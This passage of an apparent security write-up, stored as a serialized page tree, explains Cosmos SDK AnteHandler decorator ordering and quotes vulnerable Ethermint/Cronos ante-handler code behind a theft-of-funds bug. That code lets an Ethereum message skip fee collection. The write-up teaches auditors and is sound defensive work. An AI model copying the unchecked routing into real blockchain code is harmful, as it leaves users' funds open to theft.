:31,"value":10688},{"type":25,"tag":216,"props":83466,"children":83467},{"class":6922,"line":7296},[83468,83473,83477,83481,83485,83489,83493],{"type":25,"tag":216,"props":83469,"children":83470},{"style":7047},[83471],{"type":31,"value":83472},"    NewSetPubKeyDecorator",{"type":25,"tag":216,"props":83474,"children":83475},{"style":6964},[83476],{"type":31,"value":1850},{"type":25,"tag":216,"props":83478,"children":83479},{"style":6947},[83480],{"type":31,"value":40001},{"type":25,"tag":216,"props":83482,"children":83483},{"style":6964},[83484],{"type":31,"value":179},{"type":25,"tag":216,"props":83486,"children":83487},{"style":6947},[83488],{"type":31,"value":83353},{"type":25,"tag":216,"props":83490,"children":83491},{"style":6964},[83492],{"type":31,"value":5406},{"type":25,"tag":216,"props":83494,"children":83495},{"style":6927},[83496],{"type":31,"value":83497},"// SetPubKeyDecorator must be called before all signature verification decorators\n",{"type":25,"tag":216,"props":83499,"children":83500},{"class":6922,"line":7305},[83501,83506,83510,83514,83518,83522],{"type":25,"tag":216,"props":83502,"children":83503},{"style":7047},[83504],{"type":31,"value":83505},"    NewValidateSigCountDecorator",{"type":25,"tag":216,"props":83507,"children":83508},{"style":6964},[83509],{"type":31,"value":1850},{"type":25,"tag":216,"props":83511,"children":83512},{"style":6947},[83513],{"type":31,"value":40001},{"type":25,"tag":216,"props":83515,"children":83516},{"style":6964},[83517],{"type":31,"value":179},{"type":25,"tag":216,"props":83519,"children":83520},{"style":6947},[83521],{"type":31,"value":83353},{"type":25,"tag":216,"props":83523,"children":83524},{"style":6964},[83525],{"type":31,"value":10688},{"type":25,"tag":216,"props":83527,"children":83528},{"class":6922,"line":7557},[83529,83534,83538,83542,83546,83550,83554,83558,83562,83567],{"type":25,"tag":216,"props":83530,"children":83531},{"style":7047},[83532],{"type":31,"value":83533},"    NewSigGasConsumeDecorator",{"type":25,"tag":216,"props":83535,"children":83536},{"style":6964},[83537],{"type":31,"value":1850},{"type":25,"tag":216,"props":83539,"children":83540},{"style":6947},[83541],{"type":31,"value":40001},{"type":25,"tag":216,"props":83543,"children":83544},{"style":6964},[83545],{"type":31,"value":179},{"type":25,"tag":216,"props":83547,"children":83548},{"style":6947},[83549],{"type":31,"value":83353},{"type":25,"tag":216,"props":83551,"children":83552},{"style":6964},[83553],{"type":31,"value":7026},{"type":25,"tag":216,"props":83555,"children":83556},{"style":6947},[83557],{"type":31,"value":40001},{"type":25,"tag":216,"props":83559,"children":83560},{"style":6964},[83561],{"type":31,"value":179},{"type":25,"tag":216,"props":83563,"children":83564},{"style":6947},[83565],{"type":31,"value":83566},"SigGasConsumer",{"type":25,"tag":216,"props":83568,"children":83569},{"style":6964},[83570],{"type":31,"value":10688},{"type":25,"tag":216,"props":83572,"children":83573},{"class":6922,"line":7574},[83574,83579,83583,83587,83591,83595,83599,83603,83607,83612],{"type":25,"tag":216,"props":83575,"children":83576},{"style":7047},[83577],{"type":31,"value":83578},"    NewSigVerificationDecorator",{"type":25,"tag":216,"props":83580,"children":83581},{"style":6964},[83582],{"type":31,"value":1850},{"type":25,"tag":216,"props":83584,"children":83585},{"style":6947},[83586],{"type":31,"value":40001},{"type":25,"tag":216,"props":83588,"children":83589},{"style":6964},[83590],{"type":31,"value":179},{"type":25,"tag":216,"props":83592,"children":83593},{"style":6947},[83594],{"type":31,"value":83353},{"type":25,"tag":216,"props":83596,"children":83597},{"style":6964},[83598],{"type":31,"value":7026},{"type":25,"tag":216,"props":83600,"children":83601},{"style":6947},[83602],{"type":31,"value":40001},{"type":25,"tag":216,"props":83604,"children":83605},{"style":6964},[83606],{"type":31,"value":179},{"type":25,"tag":216,"props":83608,"children":83609},{"style":6947},[83610],{"type":31,"value":83611},"SignModeHandler",{"type":25,"tag":216,"props":83613,"children":83614},{"style":6964},[83615],{"type":31,"value":10688},{"type":25,"tag":216,"props":83617,"children":83618},{"class":6922,"line":7591},[83619,83624,83628,83632,83636,83640],{"type":25,"tag":216,"props":83620,"children":83621},{"style":7047},[83622],{"type":31,"value":83623},"    NewIncrementSequenceDecorator",{"type":25,"tag":216,"props":83625,"children":83626},{"style":6964},[83627],{"type":31,"value":1850},{"type":25,"tag":216,"props":83629,"children":83630},{"style":6947},[83631],{"type":31,"value":40001},{"type":25,"tag":216,"props":83633,"children":83634},{"style":6964},[83635],{"type":31,"value":179},{"type":25,"tag":216,"props":83637,"children":83638},{"style":6947},[83639],{"type":31,"value":83353},{"type":25,"tag":216,"props":83641,"children":83642},{"style":6964},[83643],{"type":31,"value":10688},{"type":25,"tag":216,"props":83645,"children":83646},{"class":6922,"line":7604},[83647],{"type":25,"tag":216,"props":83648,"children":83649},{"style":6964},[83650],{"type":31,"value":7874},{"type":25,"tag":38,"props":83652,"children":83653},{},[83654,83656,83661,83663,83669,83670,83676],{"type":31,"value":83655},"Unfortunately, that order wouldn't work. This is because there are other ",{"type":25,"tag":82,"props":83657,"children":83659},{"className":83658},[],[83660],{"type":31,"value":83191},{"type":31,"value":83662},", such as ",{"type":25,"tag":82,"props":83664,"children":83666},{"className":83665},[],[83667],{"type":31,"value":83668},"SigGasConsumeDecorator",{"type":31,"value":1307},{"type":25,"tag":82,"props":83671,"children":83673},{"className":83672},[],[83674],{"type":31,"value":83675},"ConsumeGasForTxSizeDecorator",{"type":31,"value":83677},", that modify account balances. By placing our decorator at the very start of the chain, we might pass the check and later have the signers' balances deducted before reaching the end of the decorator chain and starting transaction execution. Consequently, the invariance we intended to ensure may no longer hold, rendering our check useless.",{"type":25,"tag":38,"props":83679,"children":83680},{},[83681,83683,83689,83691,83696],{"type":31,"value":83682},"The easiest \"mitigation\" is to move our decorator down into the chain list. We say this lightly because it's important to consider various factors such as whether nested ",{"type":25,"tag":82,"props":83684,"children":83686},{"className":83685},[],[83687],{"type":31,"value":83688},"msgs",{"type":31,"value":83690}," are allowed (e.g. the authz module is present), as this precaution alone might not be enough to fully resolve the issue. Without a comprehensive understanding of the entire system, there is a risk that mistakes will still be made in the ",{"type":25,"tag":82,"props":83692,"children":83694},{"className":83693},[],[83695],{"type":31,"value":82517},{"type":31,"value":83697}," chain.",{"type":25,"tag":606,"props":83699,"children":83701},{"id":83700},"real-world-examples-2",[83702],{"type":31,"value":80661},{"type":25,"tag":38,"props":83704,"children":83705},{},[83706,83708,83713,83715,83722],{"type":31,"value":83707},"An instance of ",{"type":25,"tag":82,"props":83709,"children":83711},{"className":83710},[],[83712],{"type":31,"value":82442},{"type":31,"value":83714}," misuse is a ",{"type":25,"tag":162,"props":83716,"children":83719},{"href":83717,"rel":83718},"https://medium.com/immunefi/cronos-theft-of-transactions-fees-bugfix-postmortem-b33f941b9570",[166],[83720],{"type":31,"value":83721},"Theft of Fund bug",{"type":31,"value":83723}," that was exploited in a Cronos contract.",{"type":25,"tag":38,"props":83725,"children":83726},{},[83727,83729,83734,83736,83741,83743,83749,83751,83757,83759,83764,83766,83771],{"type":31,"value":83728},"In this scenario, ",{"type":25,"tag":82,"props":83730,"children":83732},{"className":83731},[],[83733],{"type":31,"value":83688},{"type":31,"value":83735}," are multiplexed to different ",{"type":25,"tag":82,"props":83737,"children":83739},{"className":83738},[],[83740],{"type":31,"value":82442},{"type":31,"value":83742}," sets through the user-controlled ",{"type":25,"tag":82,"props":83744,"children":83746},{"className":83745},[],[83747],{"type":31,"value":83748},"ExtensionOptionsEthereumTx",{"type":31,"value":83750}," option. However, due to a lack of tx validation, if a ",{"type":25,"tag":82,"props":83752,"children":83754},{"className":83753},[],[83755],{"type":31,"value":83756},"MsgEthereumTx",{"type":31,"value":83758}," does not have ",{"type":25,"tag":82,"props":83760,"children":83762},{"className":83761},[],[83763],{"type":31,"value":83748},{"type":31,"value":83765}," specified, it will be routed to non-Ethereum ",{"type":25,"tag":82,"props":83767,"children":83769},{"className":83768},[],[83770],{"type":31,"value":83191},{"type":31,"value":83772},", failing to collect fees from users as intended. Consequently, attackers can exploit the fee refund at the end of transaction processing to steal funds.",{"type":25,"tag":38,"props":83774,"children":83775},{},[83776],{"type":25,"tag":162,"props":83777,"children":83780},{"href":83778,"rel":83779},"https://github.com/crypto-org-chain/ethermint/blob/82805507f7d2e83cad547736883dc22acfb52440/app/ante/ante.go#L33",[166],[83781],{"type":31,"value":80711},{"type":25,"tag":206,"props":83783,"children":83785},{"code":83784,"language":80136,"meta":7,"className":80137,"style":7},"func NewAnteHandler(\n    ak evmtypes.AccountKeeper,\n    bankKeeper evmtypes.BankKeeper,\n    evmKeeper EVMKeeper,\n    feeGrantKeeper authante.FeegrantKeeper,\n    channelKeeper channelkeeper.Keeper,\n    signModeHandler authsigning.SignModeHandler,\n) sdk.AnteHandler {\n    return func(\n        ctx sdk.Context, tx sdk.Tx, sim bool,\n    ) (newCtx sdk.Context, err error) {\n        var anteHandler sdk.AnteHandler\n\n        defer Recover(ctx.Logger(), &err)\n\n        txWithExtensions, ok := tx.(authante.HasExtensionOptionsTx)\n        if ok {\n            opts := txWithExtensions.GetExtensionOptions()\n            if len(opts) > 0 {\n                switch typeURL := opts[0].GetTypeUrl(); typeURL {\n                case \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\":\n                    // handle as *evmtypes.MsgEthereumTx\n\n                    anteHandler = sdk.ChainAnteDecorators(\n                        NewEthSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                        ...\n                        NewEthIncrementSenderSequenceDecorator(ak), // innermost AnteDecorator.\n                    )\n\n                default:\n                    return ctx, stacktrace.Propagate(\n                        sdkerrors.Wrap(sdkerrors.ErrUnknownExtensionOptions, typeURL),\n                        \"rejecting tx with unsupported extension option\",\n                    )\n                }\n\n                return anteHandler(ctx, tx, sim)\n            }\n        }\n\n        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n\n        switch tx.(type) {\n        case sdk.Tx:\n            anteHandler = sdk.ChainAnteDecorators(\n                authante.NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                 ...\n                authante.NewIncrementSequenceDecorator(ak), // innermost AnteDecorator\n            )\n        default:\n            return ctx, stacktrace.Propagate(\n                sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"invalid transaction type: %T\", tx),\n                \"transaction is not an SDK tx\",\n            )\n        }\n\n        return anteHandler(ctx, tx, sim)\n    }\n}\n",[83786],{"type":25,"tag":82,"props":83787,"children":83788},{"__ignoreMap":7},[83789,83805,83830,83854,83871,83896,83922,83947,83970,83986,84042,84083,84109,84116,84162,84169,84215,84231,84261,84296,84348,84365,84373,84380,84409,84425,84433,84459,84467,84474,84486,84520,84566,84578,84585,84592,84599,84638,84645,84652,84659,84667,84674,84698,84722,84750,84775,84783,84816,84823,84835,84866,84921,84934,84942,84950,84958,84998,85006],{"type":25,"tag":216,"props":83790,"children":83791},{"class":6922,"line":6923},[83792,83796,83801],{"type":25,"tag":216,"props":83793,"children":83794},{"style":6936},[83795],{"type":31,"value":80272},{"type":25,"tag":216,"props":83797,"children":83798},{"style":7047},[83799],{"type":31,"value":83800}," NewAnteHandler",{"type":25,"tag":216,"props":83802,"children":83803},{"style":6964},[83804],{"type":31,"value":7420},{"type":25,"tag":216,"props":83806,"children":83807},{"class":6922,"line":6769},[83808,83813,83818,83822,83826],{"type":25,"tag":216,"props":83809,"children":83810},{"style":6947},[83811],{"type":31,"value":83812},"    ak",{"type":25,"tag":216,"props":83814,"children":83815},{"style":7375},[83816],{"type":31,"value":83817}," evmtypes",{"type":25,"tag":216,"props":83819,"children":83820},{"style":6964},[83821],{"type":31,"value":179},{"type":25,"tag":216,"props":83823,"children":83824},{"style":7375},[83825],{"type":31,"value":83353},{"type":25,"tag":216,"props":83827,"children":83828},{"style":6964},[83829],{"type":31,"value":7465},{"type":25,"tag":216,"props":83831,"children":83832},{"class":6922,"line":6778},[83833,83838,83842,83846,83850],{"type":25,"tag":216,"props":83834,"children":83835},{"style":6947},[83836],{"type":31,"value":83837},"    bankKeeper",{"type":25,"tag":216,"props":83839,"children":83840},{"style":7375},[83841],{"type":31,"value":83817},{"type":25,"tag":216,"props":83843,"children":83844},{"style":6964},[83845],{"type":31,"value":179},{"type":25,"tag":216,"props":83847,"children":83848},{"style":7375},[83849],{"type":31,"value":83426},{"type":25,"tag":216,"props":83851,"children":83852},{"style":6964},[83853],{"type":31,"value":7465},{"type":25,"tag":216,"props":83855,"children":83856},{"class":6922,"line":7005},[83857,83862,83867],{"type":25,"tag":216,"props":83858,"children":83859},{"style":6947},[83860],{"type":31,"value":83861},"    evmKeeper",{"type":25,"tag":216,"props":83863,"children":83864},{"style":7375},[83865],{"type":31,"value":83866}," EVMKeeper",{"type":25,"tag":216,"props":83868,"children":83869},{"style":6964},[83870],{"type":31,"value":7465},{"type":25,"tag":216,"props":83872,"children":83873},{"class":6922,"line":7110},[83874,83879,83884,83888,83892],{"type":25,"tag":216,"props":83875,"children":83876},{"style":6947},[83877],{"type":31,"value":83878},"    feeGrantKeeper",{"type":25,"tag":216,"props":83880,"children":83881},{"style":7375},[83882],{"type":31,"value":83883}," authante",{"type":25,"tag":216,"props":83885,"children":83886},{"style":6964},[83887],{"type":31,"value":179},{"type":25,"tag":216,"props":83889,"children":83890},{"style":7375},[83891],{"type":31,"value":83443},{"type":25,"tag":216,"props":83893,"children":83894},{"style":6964},[83895],{"type":31,"value":7465},{"type":25,"tag":216,"props":83897,"children":83898},{"class":6922,"line":7216},[83899,83904,83909,83913,83918],{"type":25,"tag":216,"props":83900,"children":83901},{"style":6947},[83902],{"type":31,"value":83903},"    channelKeeper",{"type":25,"tag":216,"props":83905,"children":83906},{"style":7375},[83907],{"type":31,"value":83908}," channelkeeper",{"type":25,"tag":216,"props":83910,"children":83911},{"style":6964},[83912],{"type":31,"value":179},{"type":25,"tag":216,"props":83914,"children":83915},{"style":7375},[83916],{"type":31,"value":83917},"Keeper",{"type":25,"tag":216,"props":83919,"children":83920},{"style":6964},[83921],{"type":31,"value":7465},{"type":25,"tag":216,"props":83923,"children":83924},{"class":6922,"line":7244},[83925,83930,83935,83939,83943],{"type":25,"tag":216,"props":83926,"children":83927},{"style":6947},[83928],{"type":31,"value":83929},"    signModeHandler",{"type":25,"tag":216,"props":83931,"children":83932},{"style":7375},[83933],{"type":31,"value":83934}," authsigning",{"type":25,"tag":216,"props":83936,"children":83937},{"style":6964},[83938],{"type":31,"value":179},{"type":25,"tag":216,"props":83940,"children":83941},{"style":7375},[83942],{"type":31,"value":83611},{"type":25,"tag":216,"props":83944,"children":83945},{"style":6964},[83946],{"type":31,"value":7465},{"type":25,"tag":216,"props":83948,"children":83949},{"class":6922,"line":7257},[83950,83954,83958,83962,83966],{"type":25,"tag":216,"props":83951,"children":83952},{"style":6964},[83953],{"type":31,"value":7036},{"type":25,"tag":216,"props":83955,"children":83956},{"style":7375},[83957],{"type":31,"value":82702},{"type":25,"tag":216,"props":83959,"children":83960},{"style":6964},[83961],{"type":31,"value":179},{"type":25,"tag":216,"props":83963,"children":83964},{"style":7375},[83965],{"type":31,"value":82442},{"type":25,"tag":216,"props":83967,"children":83968},{"style":6964},[83969],{"type":31,"value":7241},{"type":25,"tag":216,"props":83971,"children":83972},{"class":6922,"line":7275},[83973,83977,83982],{"type":25,"tag":216,"props":83974,"children":83975},{"style":6973},[83976],{"type":31,"value":20947},{"type":25,"tag":216,"props":83978,"children":83979},{"style":6936},[83980],{"type":31,"value":83981}," func",{"type":25,"tag":216,"props":83983,"children":83984},{"style":6964},[83985],{"type":31,"value":7420},{"type":25,"tag":216,"props":83987,"children":83988},{"class":6922,"line":7296},[83989,83993,83997,84001,84005,84009,84013,84017,84021,84025,84029,84034,84038],{"type":25,"tag":216,"props":83990,"children":83991},{"style":6947},[83992],{"type":31,"value":30144},{"type":25,"tag":216,"props":83994,"children":83995},{"style":7375},[83996],{"type":31,"value":82613},{"type":25,"tag":216,"props":83998,"children":83999},{"style":6964},[84000],{"type":31,"value":179},{"type":25,"tag":216,"props":84002,"children":84003},{"style":7375},[84004],{"type":31,"value":80321},{"type":25,"tag":216,"props":84006,"children":84007},{"style":6964},[84008],{"type":31,"value":7026},{"type":25,"tag":216,"props":84010,"children":84011},{"style":6947},[84012],{"type":31,"value":83153},{"type":25,"tag":216,"props":84014,"children":84015},{"style":7375},[84016],{"type":31,"value":82613},{"type":25,"tag":216,"props":84018,"children":84019},{"style":6964},[84020],{"type":31,"value":179},{"type":25,"tag":216,"props":84022,"children":84023},{"style":7375},[84024],{"type":31,"value":82646},{"type":25,"tag":216,"props":84026,"children":84027},{"style":6964},[84028],{"type":31,"value":7026},{"type":25,"tag":216,"props":84030,"children":84031},{"style":6947},[84032],{"type":31,"value":84033},"sim",{"type":25,"tag":216,"props":84035,"children":84036},{"style":7375},[84037],{"type":31,"value":16006},{"type":25,"tag":216,"props":84039,"children":84040},{"style":6964},[84041],{"type":31,"value":7465},{"type":25,"tag":216,"props":84043,"children":84044},{"class":6922,"line":7305},[84045,84050,84055,84059,84063,84067,84071,84075,84079],{"type":25,"tag":216,"props":84046,"children":84047},{"style":6964},[84048],{"type":31,"value":84049},"    ) (",{"type":25,"tag":216,"props":84051,"children":84052},{"style":6947},[84053],{"type":31,"value":84054},"newCtx",{"type":25,"tag":216,"props":84056,"children":84057},{"style":7375},[84058],{"type":31,"value":82613},{"type":25,"tag":216,"props":84060,"children":84061},{"style":6964},[84062],{"type":31,"value":179},{"type":25,"tag":216,"props":84064,"children":84065},{"style":7375},[84066],{"type":31,"value":80321},{"type":25,"tag":216,"props":84068,"children":84069},{"style":6964},[84070],{"type":31,"value":7026},{"type":25,"tag":216,"props":84072,"children":84073},{"style":6947},[84074],{"type":31,"value":52389},{"type":25,"tag":216,"props":84076,"children":84077},{"style":7375},[84078],{"type":31,"value":18834},{"type":25,"tag":216,"props":84080,"children":84081},{"style":6964},[84082],{"type":31,"value":18761},{"type":25,"tag":216,"props":84084,"children":84085},{"class":6922,"line":7557},[84086,84091,84096,84100,84104],{"type":25,"tag":216,"props":84087,"children":84088},{"style":6936},[84089],{"type":31,"value":84090},"        var",{"type":25,"tag":216,"props":84092,"children":84093},{"style":6947},[84094],{"type":31,"value":84095}," anteHandler",{"type":25,"tag":216,"props":84097,"children":84098},{"style":7375},[84099],{"type":31,"value":82613},{"type":25,"tag":216,"props":84101,"children":84102},{"style":6964},[84103],{"type":31,"value":179},{"type":25,"tag":216,"props":84105,"children":84106},{"style":7375},[84107],{"type":31,"value":84108},"AnteHandler\n",{"type":25,"tag":216,"props":84110,"children":84111},{"class":6922,"line":7574},[84112],{"type":25,"tag":216,"props":84113,"children":84114},{"emptyLinePlaceholder":16},[84115],{"type":31,"value":7642},{"type":25,"tag":216,"props":84117,"children":84118},{"class":6922,"line":7591},[84119,84124,84129,84133,84137,84141,84146,84150,84154,84158],{"type":25,"tag":216,"props":84120,"children":84121},{"style":6973},[84122],{"type":31,"value":84123},"        defer",{"type":25,"tag":216,"props":84125,"children":84126},{"style":7047},[84127],{"type":31,"value":84128}," Recover",{"type":25,"tag":216,"props":84130,"children":84131},{"style":6964},[84132],{"type":31,"value":1850},{"type":25,"tag":216,"props":84134,"children":84135},{"style":6947},[84136],{"type":31,"value":24240},{"type":25,"tag":216,"props":84138,"children":84139},{"style":6964},[84140],{"type":31,"value":179},{"type":25,"tag":216,"props":84142,"children":84143},{"style":7047},[84144],{"type":31,"value":84145},"Logger",{"type":25,"tag":216,"props":84147,"children":84148},{"style":6964},[84149],{"type":31,"value":22334},{"type":25,"tag":216,"props":84151,"children":84152},{"style":6953},[84153],{"type":31,"value":7059},{"type":25,"tag":216,"props":84155,"children":84156},{"style":6947},[84157],{"type":31,"value":52389},{"type":25,"tag":216,"props":84159,"children":84160},{"style":6964},[84161],{"type":31,"value":7107},{"type":25,"tag":216,"props":84163,"children":84164},{"class":6922,"line":7604},[84165],{"type":25,"tag":216,"props":84166,"children":84167},{"emptyLinePlaceholder":16},[84168],{"type":31,"value":7642},{"type":25,"tag":216,"props":84170,"children":84171},{"class":6922,"line":7613},[84172,84177,84181,84185,84189,84193,84197,84202,84206,84211],{"type":25,"tag":216,"props":84173,"children":84174},{"style":6947},[84175],{"type":31,"value":84176},"        txWithExtensions",{"type":25,"tag":216,"props":84178,"children":84179},{"style":6964},[84180],{"type":31,"value":7026},{"type":25,"tag":216,"props":84182,"children":84183},{"style":6947},[84184],{"type":31,"value":82739},{"type":25,"tag":216,"props":84186,"children":84187},{"style":6953},[84188],{"type":31,"value":80388},{"type":25,"tag":216,"props":84190,"children":84191},{"style":6947},[84192],{"type":31,"value":71997},{"type":25,"tag":216,"props":84194,"children":84195},{"style":6964},[84196],{"type":31,"value":82752},{"type":25,"tag":216,"props":84198,"children":84199},{"style":7375},[84200],{"type":31,"value":84201},"authante",{"type":25,"tag":216,"props":84203,"children":84204},{"style":6964},[84205],{"type":31,"value":179},{"type":25,"tag":216,"props":84207,"children":84208},{"style":7375},[84209],{"type":31,"value":84210},"HasExtensionOptionsTx",{"type":25,"tag":216,"props":84212,"children":84213},{"style":6964},[84214],{"type":31,"value":7107},{"type":25,"tag":216,"props":84216,"children":84217},{"class":6922,"line":7636},[84218,84222,84227],{"type":25,"tag":216,"props":84219,"children":84220},{"style":6973},[84221],{"type":31,"value":7222},{"type":25,"tag":216,"props":84223,"children":84224},{"style":6947},[84225],{"type":31,"value":84226}," ok",{"type":25,"tag":216,"props":84228,"children":84229},{"style":6964},[84230],{"type":31,"value":7241},{"type":25,"tag":216,"props":84232,"children":84233},{"class":6922,"line":7645},[84234,84239,84243,84248,84252,84257],{"type":25,"tag":216,"props":84235,"children":84236},{"style":6947},[84237],{"type":31,"value":84238},"            opts",{"type":25,"tag":216,"props":84240,"children":84241},{"style":6953},[84242],{"type":31,"value":80388},{"type":25,"tag":216,"props":84244,"children":84245},{"style":6947},[84246],{"type":31,"value":84247}," txWithExtensions",{"type":25,"tag":216,"props":84249,"children":84250},{"style":6964},[84251],{"type":31,"value":179},{"type":25,"tag":216,"props":84253,"children":84254},{"style":7047},[84255],{"type":31,"value":84256},"GetExtensionOptions",{"type":25,"tag":216,"props":84258,"children":84259},{"style":6964},[84260],{"type":31,"value":11687},{"type":25,"tag":216,"props":84262,"children":84263},{"class":6922,"line":7654},[84264,84268,84272,84276,84280,84284,84288,84292],{"type":25,"tag":216,"props":84265,"children":84266},{"style":6973},[84267],{"type":31,"value":62768},{"type":25,"tag":216,"props":84269,"children":84270},{"style":7047},[84271],{"type":31,"value":12510},{"type":25,"tag":216,"props":84273,"children":84274},{"style":6964},[84275],{"type":31,"value":1850},{"type":25,"tag":216,"props":84277,"children":84278},{"style":6947},[84279],{"type":31,"value":52531},{"type":25,"tag":216,"props":84281,"children":84282},{"style":6964},[84283],{"type":31,"value":7036},{"type":25,"tag":216,"props":84285,"children":84286},{"style":6953},[84287],{"type":31,"value":5902},{"type":25,"tag":216,"props":84289,"children":84290},{"style":6989},[84291],{"type":31,"value":6992},{"type":25,"tag":216,"props":84293,"children":84294},{"style":6964},[84295],{"type":31,"value":7241},{"type":25,"tag":216,"props":84297,"children":84298},{"class":6922,"line":7722},[84299,84304,84309,84313,84318,84322,84326,84330,84335,84339,84344],{"type":25,"tag":216,"props":84300,"children":84301},{"style":6973},[84302],{"type":31,"value":84303},"                switch",{"type":25,"tag":216,"props":84305,"children":84306},{"style":6947},[84307],{"type":31,"value":84308}," typeURL",{"type":25,"tag":216,"props":84310,"children":84311},{"style":6953},[84312],{"type":31,"value":80388},{"type":25,"tag":216,"props":84314,"children":84315},{"style":6947},[84316],{"type":31,"value":84317}," opts",{"type":25,"tag":216,"props":84319,"children":84320},{"style":6964},[84321],{"type":31,"value":7701},{"type":25,"tag":216,"props":84323,"children":84324},{"style":6989},[84325],{"type":31,"value":1882},{"type":25,"tag":216,"props":84327,"children":84328},{"style":6964},[84329],{"type":31,"value":54317},{"type":25,"tag":216,"props":84331,"children":84332},{"style":7047},[84333],{"type":31,"value":84334},"GetTypeUrl",{"type":25,"tag":216,"props":84336,"children":84337},{"style":6964},[84338],{"type":31,"value":32407},{"type":25,"tag":216,"props":84340,"children":84341},{"style":6947},[84342],{"type":31,"value":84343},"typeURL",{"type":25,"tag":216,"props":84345,"children":84346},{"style":6964},[84347],{"type":31,"value":7241},{"type":25,"tag":216,"props":84349,"children":84350},{"class":6922,"line":7730},[84351,84356,84361],{"type":25,"tag":216,"props":84352,"children":84353},{"style":6973},[84354],{"type":31,"value":84355},"                case",{"type":25,"tag":216,"props":84357,"children":84358},{"style":8205},[84359],{"type":31,"value":84360}," \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\"",{"type":25,"tag":216,"props":84362,"children":84363},{"style":6964},[84364],{"type":31,"value":9518},{"type":25,"tag":216,"props":84366,"children":84367},{"class":6922,"line":7760},[84368],{"type":25,"tag":216,"props":84369,"children":84370},{"style":6927},[84371],{"type":31,"value":84372},"                    // handle as *evmtypes.MsgEthereumTx\n",{"type":25,"tag":216,"props":84374,"children":84375},{"class":6922,"line":7768},[84376],{"type":25,"tag":216,"props":84377,"children":84378},{"emptyLinePlaceholder":16},[84379],{"type":31,"value":7642},{"type":25,"tag":216,"props":84381,"children":84382},{"class":6922,"line":7800},[84383,84388,84392,84396,84400,84405],{"type":25,"tag":216,"props":84384,"children":84385},{"style":6947},[84386],{"type":31,"value":84387},"                    anteHandler",{"type":25,"tag":216,"props":84389,"children":84390},{"style":6953},[84391],{"type":31,"value":6956},{"type":25,"tag":216,"props":84393,"children":84394},{"style":6947},[84395],{"type":31,"value":82613},{"type":25,"tag":216,"props":84397,"children":84398},{"style":6964},[84399],{"type":31,"value":179},{"type":25,"tag":216,"props":84401,"children":84402},{"style":7047},[84403],{"type":31,"value":84404},"ChainAnteDecorators",{"type":25,"tag":216,"props":84406,"children":84407},{"style":6964},[84408],{"type":31,"value":7420},{"type":25,"tag":216,"props":84410,"children":84411},{"class":6922,"line":7808},[84412,84417,84421],{"type":25,"tag":216,"props":84413,"children":84414},{"style":7047},[84415],{"type":31,"value":84416},"                        NewEthSetUpContextDecorator",{"type":25,"tag":216,"props":84418,"children":84419},{"style":6964},[84420],{"type":31,"value":22334},{"type":25,"tag":216,"props":84422,"children":84423},{"style":6927},[84424],{"type":31,"value":83267},{"type":25,"tag":216,"props":84426,"children":84427},{"class":6922,"line":7868},[84428],{"type":25,"tag":216,"props":84429,"children":84430},{"style":6953},[84431],{"type":31,"value":84432},"                        ...\n",{"type":25,"tag":216,"props":84434,"children":84435},{"class":6922,"line":13001},[84436,84441,84445,84450,84454],{"type":25,"tag":216,"props":84437,"children":84438},{"style":7047},[84439],{"type":31,"value":84440},"                        NewEthIncrementSenderSequenceDecorator",{"type":25,"tag":216,"props":84442,"children":84443},{"style":6964},[84444],{"type":31,"value":1850},{"type":25,"tag":216,"props":84446,"children":84447},{"style":6947},[84448],{"type":31,"value":84449},"ak",{"type":25,"tag":216,"props":84451,"children":84452},{"style":6964},[84453],{"type":31,"value":5406},{"type":25,"tag":216,"props":84455,"children":84456},{"style":6927},[84457],{"type":31,"value":84458},"// innermost AnteDecorator.\n",{"type":25,"tag":216,"props":84460,"children":84461},{"class":6922,"line":13019},[84462],{"type":25,"tag":216,"props":84463,"children":84464},{"style":6964},[84465],{"type":31,"value":84466},"                    )\n",{"type":25,"tag":216,"props":84468,"children":84469},{"class":6922,"line":13064},[84470],{"type":25,"tag":216,"props":84471,"children":84472},{"emptyLinePlaceholder":16},[84473],{"type":31,"value":7642},{"type":25,"tag":216,"props":84475,"children":84476},{"class":6922,"line":13170},[84477,84482],{"type":25,"tag":216,"props":84478,"children":84479},{"style":6973},[84480],{"type":31,"value":84481},"                default",{"type":25,"tag":216,"props":84483,"children":84484},{"style":6964},[84485],{"type":31,"value":9518},{"type":25,"tag":216,"props":84487,"children":84488},{"class":6922,"line":27455},[84489,84494,84498,84502,84507,84511,84516],{"type":25,"tag":216,"props":84490,"children":84491},{"style":6973},[84492],{"type":31,"value":84493},"                    return",{"type":25,"tag":216,"props":84495,"children":84496},{"style":6947},[84497],{"type":31,"value":29801},{"type":25,"tag":216,"props":84499,"children":84500},{"style":6964},[84501],{"type":31,"value":7026},{"type":25,"tag":216,"props":84503,"children":84504},{"style":6947},[84505],{"type":31,"value":84506},"stacktrace",{"type":25,"tag":216,"props":84508,"children":84509},{"style":6964},[84510],{"type":31,"value":179},{"type":25,"tag":216,"props":84512,"children":84513},{"style":7047},[84514],{"type":31,"value":84515},"Propagate",{"type":25,"tag":216,"props":84517,"children":84518},{"style":6964},[84519],{"type":31,"value":7420},{"type":25,"tag":216,"props":84521,"children":84522},{"class":6922,"line":27490},[84523,84528,84532,84536,84540,84545,84549,84554,84558,84562],{"type":25,"tag":216,"props":84524,"children":84525},{"style":6947},[84526],{"type":31,"value":84527},"                        sdkerrors",{"type":25,"tag":216,"props":84529,"children":84530},{"style":6964},[84531],{"type":31,"value":179},{"type":25,"tag":216,"props":84533,"children":84534},{"style":7047},[84535],{"type":31,"value":82818},{"type":25,"tag":216,"props":84537,"children":84538},{"style":6964},[84539],{"type":31,"value":1850},{"type":25,"tag":216,"props":84541,"children":84542},{"style":6947},[84543],{"type":31,"value":84544},"sdkerrors",{"type":25,"tag":216,"props":84546,"children":84547},{"style":6964},[84548],{"type":31,"value":179},{"type":25,"tag":216,"props":84550,"children":84551},{"style":6947},[84552],{"type":31,"value":84553},"ErrUnknownExtensionOptions",{"type":25,"tag":216,"props":84555,"children":84556},{"style":6964},[84557],{"type":31,"value":7026},{"type":25,"tag":216,"props":84559,"children":84560},{"style":6947},[84561],{"type":31,"value":84343},{"type":25,"tag":216,"props":84563,"children":84564},{"style":6964},[84565],{"type":31,"value":10688},{"type":25,"tag":216,"props":84567,"children":84568},{"class":6922,"line":27498},[84569,84574],{"type":25,"tag":216,"props":84570,"chil